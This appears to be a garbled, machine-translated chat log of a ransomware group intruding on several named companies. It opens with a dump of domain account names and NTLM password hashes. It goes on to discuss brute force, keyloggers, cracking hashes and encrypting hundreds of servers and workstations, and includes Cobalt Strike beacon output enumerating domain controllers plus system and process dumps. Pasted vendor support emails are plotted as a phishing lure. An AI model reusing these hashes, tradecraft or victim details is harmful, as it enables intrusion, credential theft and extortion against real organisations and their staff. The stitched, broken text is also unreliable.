4096 39621 ITCMA-LT1045A$ 652249fc223d285ba5b1df3251c192dd 4096 5324 ScottW 0d242248fffaa41f252e6208536793e9 512 8119 JonR 6c71c63361f9dc21a430202ab51778ec 512 8188 grantc 5bbe84fdc0909a8bf546a43a0e8f51f8 512 5691 ITCMA-FILE01$ 0432a09dab08a33ae21a840e783b5b5e 4096 4610 ITCMA-LT1024$ eae3eede976d2eb45dd3f3fa53df50f1 4096 6617 ITCMA-LT1090$ 9c2d2a7e1bf5a2400e3b9fbf6fb9f773 4096 8137 TroyR 74ff53312573ba0b4c14a02e699bc783 512 5315 ITCMA-WS1085$ 880db01931a6af925d9e16be8df4152b 4096 9151 ASITC-WS0052$ b6d0bdf0d33dd8ff2a4bfb6eff0f232a 4096 39661 jacobc 94629c257cf1c3484f7ce4b958d58465 512 9156 ASITC-WS0085$ 50db7ddeb7f9330fb46080c77e3e57f0 4096 40112 7dfe93aa1c69e0babe9f47d13f1244e1 512 9165 ASITC-WS0053$ 4db8640f43556b8bdaf26aada8701513 4096 9153 ASITC-WS0057$ 0258d1a53e8dbdec225c8dd4968d604e 4096 8138 AdamY f91c84f965aeaa6fa40061c2abf6015a 512 9213 ASITC-WS0092$ 77c16a86697dd4b86e34338d732240df 4096 9135 ASITC-WS0079$ 074ed936013417af38e68eac259455aaa 4096 9169 ASITC-WS0087$ 71c821d37d1ad6b1ad0c470819d55ecc 4096 6616 krist 589b85762d8ab451401df29aa7fdc417 512 40136 maxz ddf78b035828826e543a46b39136e719 512 40140 sonicwall_sslvpn 68d8b93b306e84fbc9cafbdc4862e2e45 66048 5345 CharlieS 8b614a4fa418d5dba77fe0507be8198f 512 9168 ASITC-WS0022$ 2cc6319c387e51328fec80047fda3980 4096 1290 rickyc 89999c3eb657280f275c08e2053ff9 512 9186 ASITC-WS0008$ d4ff1162d4facc94781f959a1fbb5941 4096 9164 ASITC-WS0062$ f4fdab0da2b779bdd983bc2d46611985 4096 9202 ASITC-WS0083$ 0643a9a9a37b5e27d2cd214b646f6b66e6 4096 9200 ASITC-WS0017$ 57087e094812b9580cd506a0c4b26393 4096 9157 ASITC-WS0065$ 28df06b223c9d6d67127a5eff355f250 4096 9183 ASITC-WS0076$ 4419874956a21e8bc8b94415a69caa1d 4096 5116 nickn 5ad8dfa79777ae85e3a9198994afc79b 512 9180 ASITC-WS0003$ b1a85968fc759735ff51fcbdfbacdf75 4096 1723 Vincenth 77821fad0a661be0ba6605ad032bc674 512 1227 9d9f65e7770f2eb4a9a9922785a37026 66048 39641 jendyl ac73e3569312c470c1173050f9763713 512 5141 ellisq ef5a55e8e2c597fb2274a0db179de291 512 9143 
ASITC-WS0012$ c2aa049aca815fa017ceb9b35ac573eb 4096 2200 ITCMA-RDS01$ c2b76ea483a7b734fe9b809c505454b1 4096 5651 MartinZ 1d0c3a53e095f1de8aeac193fc50a1fc 512 9158 ASITC-WS0066$ b5790d71ccb65d5f0a173dfa6af9f5e7 4096 9163 ASITC-WS0058$ 785c911425e4dba6650253bd2e6adfa4 4096 5307 SpringL 4c3879fef394fa5dce0037c197c70841 512 9149 ASITC-WS0042$ a2e739b1a844c342cd53b990e30349eb 4096 9182 ASITC-WS0060$ 374be92c8d690faf9152ecabcee56bb8 4096 5337 LilyY a3d7d25665f1146b56192b850fd57a93 512 1722 Kennetht ac73e3569312c470c1173050f9763713 512 9172 ASITC-WS0005$ 9e57afffcbef2ff80156c6f45eea94d8 4096 9215 ASITC-WS0100$ a0dd5d2ac2fd77398d34022ad30af4cd 4096 9185 ASITC-WS0015$ d004d9a9552304e9c3e17401a8d1b741 4096 9145 ASITC-WS0011$ cbabe431f02624d2aeef9f20dccff406 4096 5355 jennyh 0c6ee318d17ec8350c0e4072c7598688 512 9117 ASITC-WS0047$ 2178a6041d81a4db6e93ebdb60bdad93 4096 9195 ASITC-WS0018$ 4b15087c8ba463248e601e8d3bc12d58 4096 9128 ASITC-WS0041$ bae8e6cca6cca90b76a169c8e30ded1c 4096 1109 jenniferl a13fe7d09755075eac80a205bb64fe5c 512 8196 jerryh 3f05f368eb0a6355e7071fb1bd1772f1 512 1108 johnp 76cf8d1787696fa522b1b41876d1bf11 512 9171 ASITC-WS0002$ 526eb819e509b9d36f19884cd292f0eb 4096 1112 rockyx a243ea0a666107e5946362230e328cf3 512 9218 ASITC-WS0103$ f361e82f7477397813e7518335030dbe 4096 5685 warehouse4 a243ea0a666107e594646362230e328cf3 512 8146 LilyW ac73e3569312c470c1173050f9763713 512 9192 ASITC-WS0091$ 8057ddd7385e20cf72b03467b71b1055 4096 40125 angelad cef2eb521883d390b32b0b5bb916f7bb 512 9224 ASITC-WS0124$ e601c71b66cfbd841c2205369019bd12 4096 9222 ASITC-WS0107$ 65e14c85412376d5466beabd34bef078 4096 5675 TomX 91e049ff1cde360a572baa9e56ad06fd 512 1114 leoc 150180de61e3227350ff3d5071491db8 512 9122 ASITC-WS0038$ e1ae58f2ddce651ba004a6e50e58b365 4096 9154 ASITC-WS0019$ 17d89c904db18d8891450f73e9c1102e 4096 9133 ASITC-WS0028$ bdc3f3e7df71268bd68f2e7a0ca210d5 4096 9196 ASITC-WS0074$ d948dbd6bc6ecd5fb22b8b9a01c7f02b 4096 9179 ASITC-WS0007$ b74c2aacf8a4c93d4f4e0ea8e3b5ec7c 4096 
5342 nk_admin 27d2802e45ca182a36a973e1196d3140 512 5674 ITCMA-WS1103$ 79dae924620dc3597721c8fb781b0418 4096 1721 Georged 589b85762d8ab451401df29aa7fdc417 512 41106 MSOL_ee11aef66e2f 6c03524467d457057285375c927dc454 66048 5656 winniez 768b312e7c14f5ee736e9d4034e0f305 512 9173 ASITC-WS0082$ c50ff420363cc0c2c3754d1a8cea8816 4096 9134 ASITC-WS0029$ 61e3b015e1181c6dd1e9d63c617e4e11 4096 2214 ITCMA-WS1069$ 5d46cf0d0441efc1f5f87e01c6fefc 4096 6605 JasonC 3dbc75a400cd00a0bc8cf4e0c224942b 512 41113 ITCMA-LT1089$ 8882bc0e7054dea98c44e3ee950ef70e 4096 8128 MaxW 2e15903e952c12546b70e040e2c0108f 512 40124 valeriet 1d06532226cfd222dfe7d3345a624002 512 1121 sueb cef2eb521883d390b32b0b5bb916f7bb 512 1712 kathyor b5fb31b1e2fb8c139e6bcac28bcd7441 512 39646 johnnyp 045d0f10ff8f7211af43cd83cd57dfbb1 512 40181 ITCMA-PDM02$ fee7c0bec5318d556fcd6d24a24d2409 4096 39687 ITCMA-PDM01$ 48f7baea11ec5f7a38ddbc5fc0846999 4096 39696 ITCMA-LT1084$ 4f441d3427ebda9bf1fd27bc28c21d56 4096 9170 ASITC-WS0006$ 49e58bf3899318799d2eda67e1fc454c 4096 9221 ASITC-WS0117$ 58dc929f38be59ba560603bef738da95 4096 9116 ASITC-WS0048$ 2b9b4cc96125ddfd7a21f82eb0d75281 4096 1226 ITC-SHIP01$ 02e9d34a1fc453dfde9912a0e71f48df 4096 39640 mits 5c31c260d6ffad231aa02fb4dd4fba5c 66048 5625 ITCMA-LT1036$ eb8b49dc77472c0c525444cb926ce22f 4096 8166 br_admin 555601b2d489ec2bfb7d189544736c8b 512 5673 ITCMA-WS1102$ f4cba060887dba209fd64aeef486c7a9 4096 8167 ITCMA-LT1067$ 858962301f26159a8fda2486219079a6 4096 8152 ToddD f2a808efade793dd9d6c5c5e0f5a3fdc 512 9174 ASITC-WS0077$ 14eca4102e70e7893ab9172241b26771 4096 40190 ASITC-WS0102$ ff3a54a4f043a3ae507a89f12d9c3baf 4096 8154 PeanutW 785e7255bf1d30e599ee84d67a732a3a 512 39669 clarkq 496d433763519e769c9e959d0924814f 512 9214 ASITC-WS0099$ f4eb1fb33d94882c1971b6e44f180e2b 4096 9115 ASITC-WS0050$ 21b24694208f2fad3efbbe88a0fc4264 4096 9140 ASITC-WS0025$ 084e4246aaf6f222d11ea232c9ca4e4a 4096 9132 ASITC-WS0027$ 631d50d60830b86b79cb04b5428b9e3a 4096 8122 arongQ 
where did you get without a domain did not take the risk yet where the administrator did not show pinged all machines yesterday and let the brute force with the domain on the ms17 did not work this LA - domain user there is a system, no current craps except the current LA do not roll? remote.itc-us.com ``` can itc-us.com be accessed in the file? this particular pcc 139 445 3389? is it ok now? user7user8good, already interesting itc-us.com microadmins, i checked itc-us.com ``Some movement has occurred.
No movement so far.`` i checked the jjgarcian, aruizmon sessions and found no craps, those that were kerd did not fit i checked everything and everyone on la and i checked for passwords nothing (glaselbl > vve8 beacon> sleep 100 ??0.dead.waterway.comkobu meemi nicht mehr als die kobu wirkschlossen in slipknot 1000 +goodnight see you tomorrow = )Adios, everybody, see you tomorrowhttp://vk.com/@thntofff-ataki-na-active-director-razbiraem-aktualnye-metody-robshihs all gonehiiGood morningMay somebody open the door? Good night, everybody. night) CORP: srvs: by hell: 617 alive:513 closed:415 (8 stopped pinging\90 masked and killed processes) arms: in hell: 5383 alive: 1,177 EQUIP: srvs: by hell: 7 alive: 7 shut down: 7 arms: by hell: 510 alive: 175 FILIAL: srvs: by hell: 51 alive: 43 shut down: 43 arms: by hell: 1,057 alive: 359 TELEVISA: srvs: by hell: 6 alive: 6 shut down: 6 arms: by hell: 5 alive: 0 TSM: srvs: by hell: 64 alive: 61 shut down: 56 (5 were masked) arms: by hell: 1,287 alive: 488 all live armas were distributed and the build is running and disks were shared vim's server is encrypted found one NAS with old backups - it's been wiped ````equiposoi.com.mx`DA`
I wrote that no@tl1 New grids will be today? not everywhere there is a note keylogging? to the fact that they are not itching at all ... well, I see) waiting for login + alertno not alertaet more min 30 minutes how long will wait for the alerts? at threetut, I checked e-mail as if one @user8 does everything look for files there@all where everything? what do we have on the mouth? so they certainly changed passes) aha at first the exh was not available, but the problem was in the proc)) i checked 4 admins - no passwords? no, i can't get info on rtp in the mail? ready at 17:30 thank you + keylog is ready, anyone have blauer? all have keylog working? i have 1,3 except blauer know exactly what i have, do we all have sessions? displayName: Dianne Jarden >displayName: Brandon Lauer >displayName: Greg Keller >displayName: Mark Harper >displayName: Mike Pusatera Or at 5:00 in the morning? What are they writing there 2 people at #1-done-rtpcompany-com read the post at 4:30 ready at 5 work with water at 5 that's it, it didn't want to go in, it only went in at 10.
The following snapshots listed under volumes or snapshot collections listed under volume collections are not considered *unmanaged* by the Case Automation rules because they are managed by a different process than a retention policy:
a) Triggered by user action; these are considered *manual* snapshots
b) Triggered by third party software, the REST API, or a script; these are considered *externally triggered* snapshots
c) Triggered by HPE Nimble Storage Array due to a user action, such as volume restore, resize, promote, demote; these are considered *manual* snapshots
d) Triggered by an agent (such as VMware VVOL); these are considered *externally triggered* snapshots
e) Triggered by *handover* action; these snapshots are considered *manual* snapshots but currently managed by the retention schedule and require no user action

In the situation where the condition above is not resolved, the Case Automation will open another case after the time period defined as "Sleep Time". The default "Sleep Time" for the Unmanaged Snapshot(s) Case Automation is 12 days, but may be changed, if so desired. If the Array Group was updated to NimbleOS 5.1.x over 90 days ago and unmanaged snapshots are over 90 days old, those snapshots will no longer trigger Case Automation, to avoid repeat notification.

If you wish to no longer have cases opened nor receive case notifications for this alert type, you may disable this alert from generating cases completely for your array as follows: log in to the HPE InfoSight Web Portal at http://infosight.hpe.com/ Under the Wellness tab,
* Click the "Configure Wellness Rules" button
* To disable case creation and notification for all arrays, uncheck the "Create Issue?" checkbox next to the rule named "Condition Name".
* To disable case creation and notification for a specific array:
  * Expand the "Condition Name" rule by selecting the "+" sign next to the rule name
  * Uncheck the "Create Issue?" checkbox next to a specific serial number.
NOTE: After the automatic case generation has been disabled (removed) for a certain condition, there will not be any more automatic cases created until the case generation is re-enabled manually. If you have additional questions or require assistance, please reply to this email and an HPE Nimble Storage Support engineer will reach out to you. If you choose to contact HPE Nimble Storage Support by phone regarding this issue, please be sure to provide the case number in order to facilitate a rapid resolution. Telephone and Email Support is available 24x7. Contact details for your location can be found at the following web page: https://www.hpe.com/us/en/services/nimble-storage.html For your convenience, the following is the U.S. support contact information: Toll-free: 1-877-3NIMBLE (877-364-6253), extension 2 Local: 408-432-9600, extension 2 Email: support@nimblestorage.com For other international support phone numbers, scroll down to HPE Nimble Support section and expand the "Technical Support Phone Numbers" on the webpage: https://www.hpe.com/us/en/services/nimble-storage.html
``Thank you''.
* Nimble OS $ snap --list --all --unmanaged
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A

b) Choose an appropriate value for the expiration of the unmanaged snapshots and check which snapshots have already expired, which ones will expire, and when.
NOTE: A negative value shows when snapshots would have already expired; a positive value shows in what amount of time the snapshots will expire based on the value and units checked.
* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl --snap_ttl_unit
Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl 24 --snap_ttl_unit hours
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours

c) Select the snapshots which you prefer to keep for longer than the rest of the unmanaged snapshots and edit the TTL value directly. This can be done on the snap and snapcoll levels.
* Nimble OS $ snap --edit --vol --ttl --ttl_unit
Example:
* Nimble OS $ snap --edit vc1-vc1s1-2019-04-29::17:56:00.000 --vol v1 --ttl 60 --ttl_unit days

d) Change TTL to the enabled state and choose appropriate units and value of units.
NOTE: It is recommended to select an expiry unit value higher than any other currently present schedule in order to ensure snapshots have enough retention as required.
* Nimble OS $ group --autoclean_unmanaged_snapshots yes --snap_ttl --snap_ttl_unit
Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots on --snap_ttl 30 --snap_ttl_unit days
* INFO: Snapshot Time-to-live is set to 30 days.

e) Verify that the list of unmanaged snapshots has had its expiry time updated as desired:
* Nimble OS $ snap --list --unmanaged --all
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +8.57 weeks
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +4.29 weeks

A new case #04124985 has been created for you with Nimble Storage. Information about the case is listed below.
Account Name: Waterway Gas & Wash Company
Array SN: AF-180176
Array Name: ww-nimble-01
Nimble Group Name:
Case Number: 04124985
Case Priority: P3
Case Category: Snapshots
Case Origin: Autosupport
Case Owner: Support Queue - General
Case Subject: Unmanaged snapshot(s) have been detected due to configuration change
Case Description: PLEASE NOTE: This is an automatically closed case; if the condition is expected, no reply is required. Additional information regarding the issue described below is available to you in the form of an HPE InfoSight Knowledge Base (KB) article. Articles are hosted from the HPE InfoSight portal. The link provided will allow direct access for only seven (7) days without requiring that you log in to the InfoSight Portal. Please click on the title link to open or download the article: https://infosight.hpe.com/InfoSight/dispatch?token=eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlbi10eXBlIjoiZG9jdW1lbnRhdGlvbi5rYkFydGljbGUucmVhZCIsImV4cCI6MTYxMDk4OTMyNCwic3ViIjoiQUYtMTgwMTc2IiwiaWF0IjoxNjEwMzg0NTI0LCJrYi1pZCI6IjAwMDA5NiIsImF1ZCI6IlBvcnRhbCIsImlzcyI6IlBhY2hpbmtvIn0.NYZ3RLJ4tRJssRAnJp-nrFQ-GgPkySPqCSsHQ-X5nM4
HPE Nimble Storage Case Automation has detected unmanaged snapshot(s) on your array.
The snapshot(s) became *unmanaged* due to a configuration change of the volume collection, schedule, or volume association to a volume collection. In certain situations, snapshot(s) on the downstream replication partner could become unmanaged due to a name change of the volume collection or a schedule on the upstream replication partner. Because the affected snapshot(s) are no longer managed by a schedule, they will remain on the array indefinitely unless the Time-To-Live (TTL) feature will be enabled or until they have been removed/deleted manually. As changes accumulate in the parent volume, the snapshot(s) will consume increasing amounts of space. There are a few considerations regarding the deletion of unmanaged snapshots; please ensure to review the KB article attached to this case for more details. To avoid these cases in the future, you may enable Time-To-Live feature (TTL), which is available as of NimbleOS 5.1.x. The feature will expire the snapshots which are considered unmanaged automatically based on the set period of time. TTL is enabled manually by the user via CLI only. Following, are the recommended steps to enable the feature: a) List current snapshots which are unmanaged, note that current expiry is set to "N/A" such as in the example: ``Davaiem... let's better copypaste fullscreen messages from nimblahhhhhhahh helpdesk so they collect some from neighboring pc or predict user input))))120 percent is it so they generate 20 percent garbage in the output?)))we only have 1 chance to make keyloggers work at 120 percent where will flash ctrl look where will copy from if there? 
``` [ctrl][v] [ctrl][v] ``ok, now I get the idea that it's realistic once could bemight think that boganulot to alert about logging in all you have to log in 1 in 1 you catch the pass in the keyloggerwill make them log in no, they will do it differently, write on behalf of nimbla) well I mean, that will pass social engineering if they start to spam each other about nimbla?they send it so a week ago they wrote it is fresh, but it is no different from the old ones that they sent earlier and repeat they send it to each other but the date is fresh?now i will send a screenshot of the letter to my modest count of 3 and many times they forwarded the last letter between them (also was a long time ago) nothing more? a million is how much in our terms? there was only correspondence with the supplier, but it was a million years ago blah blah blah it is for 192.168.0.75 read more carefully i have seenwhen they communicate so did not meet some nimble trust some nimble contactsgkeller there someone explained to someone for nimble as i remember nimble helpdesk tell me who they correspond with regarding nimble files and backups in ortpa no, there are several sessions in slip + build and other things prepare for this time soxda hang a hundred years in 4 start vodokaylogger scattered?no already, no rts check live sessions quicklyg hello, user 3 is delayed where do we have @user3 ? hello:space_invader:hii all in place? hello brothanks bro+user3@tl1 please add @user3 here ntlm hash-stop, and those hashes that rubus pulls can he do tokens with them or not ?@user7 have you skimmed hashes from trusts yet? will we put all hashes on cmd5 and clears into the farm? i need to feed it with passlists only i will suffer because of this situation with kerbamy i would say if it was brutalized(( @tl2 @tl1 did any of this brutalized?
look at all they repeat so there is corp.televisa.com.mx and televisa.com.mxS-1-5-21-1935655697-329068152-1801674531 The SIDs of the odin are not everyone is correct more accurately different.... crap the structure is weird again, they are different e.g. dn:CN=tsm.televisa.com.mx,CN=System,DC=corp,DC=televisa,DC=com,DC=mx dn:CN=tsm.televisa.com.mx,CN=System,DC=televisa,DC=com,DC=mx ``Why are....+ repeated exactly the same way?
```
Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:33:32> shell nltest /dclist:televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:televisa.com.mx
[+] host called home, sent: 61 bytes
[+] received output:
Get list of DCs in domain 'televisa.com.mx' from '\\TVSASFEDC01.televisa.com.mx'.
TVSAKIODC01.televisa.com.mx [PDC] [DS] Site: SFE
TVSASFEDC01.televisa.com.mx [DS] Site: SFE
TVSAAZDC01.televisa.com.mx [DS] Site: AZURE
TVSAAZDC02.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:35:46> shell nltest /dclist:corp.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:corp.televisa.com.mx
[+] host called home, sent: 66 bytes
[+] received output:
Get list of DCs in domain 'corp.televisa.com.mx' from '\\CORPKIODC02.corp.televisa.com.mx'.
CORPSFEDC02.corp.televisa.com.mx [DS] Site: SFE
CORPKIODC03.corp.televisa.com.mx [PDC] [DS] Site: SFE
CORPSNGDC02.corp.televisa.com.mx [DS] Site: SNG
CORPSFEDC04.corp.televisa.com.mx [DS] Site: SFE
CORPKIODC02.corp.televisa.com.mx [DS] Site: SFE
CORPKLHLQDC01.corp.televisa.com.mx [DS] Site: QRO
CORPKLHLSDC01.corp.televisa.com.mx [DS] Site: SFE
CORPKIODC04.corp.televisa.com.mx [DS] Site: SFE
CORPAZDC01.corp.televisa.com.mx [DS] Site: AZURE
CORPAZDC02.corp.televisa.com.mx [DS] Site: AZURE
CORPCHADC02.corp.televisa.com.mx [DS] Site: SFE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:36:08> shell nltest /dclist:equiposoi.net
[*] Tasked beacon to run: nltest /dclist:equiposoi.net
[+] host called home, sent: 59 bytes
[+] received output:
Get list of DCs in domain 'equiposoi.net' from '\\SOISFEDC01.equiposoi.net'.
SOISFEDC01.equiposoi.net [PDC] [DS] Site: Equiposoi
SOISFEDC02.equiposoi.net [DS] Site: Equiposoi
AZPRDC010.equiposoi.net [DS] Site: Equiposoi
AZPRDC009.equiposoi.net [DS] Site: Equiposoi
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:37:31> shell nltest /dclist:filial.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:filial.televisa.com.mx
[+] host called home, sent: 68 bytes
[+] received output:
Get list of DCs in domain 'filial.televisa.com.mx' from '\FILIALSFEDC05.filial.televisa.com.mx'.
FILIALIALSFEDC05.filial.televisa.com.mx [PDC] [DS] Site: SFE
FILIALIALSFEDC02.filial.televisa.com.mx [DS] Site: SFE
FILIALIALAZDC01.filial.televisa.com.mx [DS] Site: AZURE
FILIALIALAZDC02.filial.televisa.com.mx [DS] Site: AZURE
FILIALIALSFEDC01.filial.televisa.com.mx [DS] Site: SFE
Filialazdc03.filial.televisa.com.mx [DS] Site: AZURE
The command completed successfully

Teemo[CORPSFECRT04]SYSTEM */636|2021Jan22 22:38:08> shell nltest /dclist:tsm.televisa.com.mx
[*] Tasked beacon to run: nltest /dclist:tsm.televisa.com.mx
[+] host called home, sent: 65 bytes
[+] received output:
Get list of DCs in domain 'tsm.televisa.com.mx' from '\\TSMSFEDC01.tsm.televisa.com.mx'.
TSMSFEDC05.tsm.televisa.com.mx [PDC] [DS] Site: SFE
TSMAZDC01.tsm.televisa.com.mx [DS] Site: AZURE
TSMAZDC02.tsm.televisa.com.mx [DS] Site: AZURE
TSMSFEDC01.tsm.televisa.com.mx [DS] Site: SFE
TSMAZDC03.tsm.televisa.com.mx [DS] Site: AZURE
The command completed successfully
```
the fuckup came out, the trusts are 5, in adinfo they are repeated theydabuild was new?)and if I start the dll there will essentially come only after what time in the bilder was specified `Task SvcRestartTask#27778 22/01/2021 01:38:45 p. Ready `no+systems right yet ? `CORPSFECRT04 `hooked up a session on adinfo 14a how many are there ? or not ?and just in case in some of the trusts fix kinunorm, as soon as the vpn turn on I immediately fix the server (there's the last login was in June 20) and I can only zakrepa youokda fix that on the polzachet, and he hz when your vpn turn onrebildniy shelkodest sessiona you have not fix? found a server where you can fix .is there a session alive ? if so can spam it on me, silkod aboveponyalbakapki machines in the lock or in the trashbakapki informationa why do we need them?
virtualkuks\machines is a backup of what?yes, most likely we'll take the small ones)):-) let's better take 7.8k backups20 gb backups should we download?)good day) good night everybody good night60 until tomorrow how much tomorrow by 12:-) good guys, let's clean up after ourselves, slip it in and see you tomorrowDBDB Server?
``Write in DB+these virtuals``.
``Processes from one to the studio tomcat
here, these 4 more? TLCAutoTF2.loomisco.com TLCANALYTICS1.loomisco.com TLCAutoTFR.loomisco.com TLCSKLM1.loomisco.com TLCEPICCS01.loomisco.com ``` there's a description of Applied Epic in this group ``` Applied Epic is the most technologically advanced cloud-based software application built for independent insurance agencies to automate business operations and drive connectivity to insurers and insureds in the changing insurance marketplace `````` Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 2 DHCP Enabled: No IP address(es).
[01]: 192.168.0.100 `````` Host Name: EPICAPM OS Name: Microsoft Windows Server 2012 Standard OS Version: 6.2.9200 N/A Build 9200 OS Manufacturer: Microsoft Corporation OS Configuration: Member Server OS Build Type: Multiprocessor Free Registered Owner: Registered Organization: Product ID: 00184-20216-77791-AA002 Original Install Date: 12/30/2015, 3:54:54 AM System Boot Time: 6/13/2020, 6:34:03 PM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2594 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 4/5/2016 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8.032 MB Available Physical Memory: 6.263 MB Virtual Memory: Max Size: 9.952 MB Virtual Memory: Available: 8,052 MB Virtual Memory: In Use: 1,900 MB Page File Location(s): C:\pagefile.sys Domain: loomisco.com Logon Server: N/A Hotfix(s): 169 Hotfix(s) Installed. ```VMs''. 
Image Name PID Session Name Session# Mem Usage User Name CPU Time ========================= ======== ================ =========== ============ ================================================== ============ System Idle Process 0 Services 0 20 K NT AUTHORITY\SYSTEM 10724:49:14 System 4 Services 0 304 K N/A 1:45:28 smss.exe 268 Services 0 1,072 K NT AUTHORITY\SYSTEM 0:00:00 csrss.exe 356 Services 0 4,744 K NT AUTHORITY\SYSTEM 0:00:16 csrss.exe 420 Console 1 3,628 K NT AUTHORITY\SYSTEM 0:00:00 wininit.exe 428 Services 0 3,940 K NT AUTHORITY\SYSTEM 0:00:00 winlogon.exe 456 Console 1 5,476 K NT AUTHORITY\SYSTEM 0:00:00 services.exe 520 Services 0 12,584 K NT AUTHORITY\SYSTEM 0:05:33 lsass.exe 528 Services 0 15,956 K NT AUTHORITY\SYSTEM 0:09:39 svchost.exe 640 Services 0 7,644 K NT AUTHORITY\SYSTEM 0:00:15 SEDService.exe 672 Services 0 11,020 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 744 Services 0 7,244 K NT AUTHORITY\NETWORK SERVICE 0:02:27 svchost.exe 796 Services 0 16,680 K NT AUTHORITY\LOCAL SERVICE 1:11:22 LogonUI.exe 832 Console 1 27,584 K NT AUTHORITY\SYSTEM 0:00:00 dwm.exe 840 Console 1 33,316 K Window Manager\DWM-1 0:00:00 svchost.exe 864 Services 0 73,508 K NT AUTHORITY\SYSTEM 2:19:36 svchost.exe 908 Services 0 12,780 K NT AUTHORITY\LOCAL SERVICE 0:00:01 svchost.exe 1152 Services 0 23,248 K NT AUTHORITY/NETWORK SERVICE 0:01:56 svchost.exe 1292 Services 0 11,396 K NT AUTHORITY\LOCAL SERVICE 0:00:00 spoolsv.exe 1464 Services 0 9,336 K NT AUTHORITY\SYSTEM 0:00:00 armsvc.exe 1496 Services 0 4,312 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Client.FileServ 1536 Services 0 17,920 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Client.Listener 1616 Services 0 23,084 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Client.ProxySer 1672 Services 0 14,720 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Deployment.Inst 1724 Services 0 23,856 K NT AUTHORITY\SYSTEM 0:00:00 ASI.SMART.Internals.Share 1820 Services 0 24,416 K NT AUTHORITY\SYSTEM 0:00:00 atashost.exe 1864 Services 0 3,856 K NT 
AUTHORITY\SYSTEM 0:00:00 cissesrv.exe 1884 Services 0 3,756 K NT AUTHORITY\SYSTEM 0:00:00 HpAmsStor.exe 1908 Services 0 3,600 K NT AUTHORITY\SYSTEM 0:00:00 ProLiantMonitor.exe 1956 Services 0 6,440 K NT AUTHORITY\SYSTEM 0:00:00 SSPService.exe 2124 Services 0 18,096 K NT AUTHORITY\SYSTEM 0:00:01 smhstart.exe 2800 Services 0 7,624 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 2848 Services 0 14,980 K NT AUTHORITY\SYSTEM 0:32:12 tvnserver.exe 2880 Services 0 5,172 K NT AUTHORITY\SYSTEM 0:00:01 VGAuthService.exe 2948 Services 0 10,728 K NT AUTHORITY\SYSTEM 0:00:00 cmd.exe 2956 Services 0 1,928 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 2968 Services 0 2,936 K NT AUTHORITY\SYSTEM 0:00:00 hpsmhd.exe 2980 Services 0 16,832 K NT AUTHORITY\SYSTEM 0:00:00 vmtoolsd.exe 3004 Services 0 88,820 K NT AUTHORITY\SYSTEM 1:30:18 ManagementAgentHost.exe 3028 Services 0 10,108 K NT AUTHORITY\SYSTEM 0:00:01 hpqams.exe 3060 Services 0 17,176 K NT AUTHORITY\SYSTEM 1:08:07 rotatelogs.exe 3216 Services 0 3,420 K NT AUTHORITY\SYSTEM 0:00:00 rotatelogs.exe 3224 Services 0 3,424 K NT AUTHORITY\SYSTEM 0:00:00 WmiPrvSE.exe 3304 Services 0 25,580 K NT AUTHORITY\SYSTEM 0:01:52 WmiPrvSE.exe 3312 Services 0 44,804 K NT AUTHORITY\NETWORK SERVICE 1:38:54 hpsmhd.exe 3424 Services 0 18,220 K NT AUTHORITY\SYSTEM 0:00:00 rotatelogs.exe 3532 Services 0 3,456 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 3540 Services 0 3,056 K NT AUTHORITY\SYSTEM 0:00:00 rotatelogs.exe 3564 Services 0 3,436 K NT AUTHORITY\SYSTEM 0:00:00 conhost.exe 3572 Services 0 3,052 K NT AUTHORITY\SYSTEM 0:00:00 svchost.exe 4024 Services 0 8,664 K NT AUTHORITY\NETWORK SERVICE 0:00:01 svchost.exe 4060 Services 0 4,648 K NT AUTHORITY\NETWORK SERVICE 0:00:00 dllhost.exe 296 Services 0 10,888 K NT AUTHORITY\SYSTEM 0:00:00 msdtc.exe 4284 Services 0 7,660 K NT AUTHORITY\NETWORK SERVICE 0:00:00 RouterNT.exe 4568 Services 0 8,744 K NT AUTHORITY\SYSTEM 0:00:13 ManagementAgentNT.exe 2996 Services 0 7,360 K NT AUTHORITY\SYSTEM 0:03:38 swc_service.exe 4796 
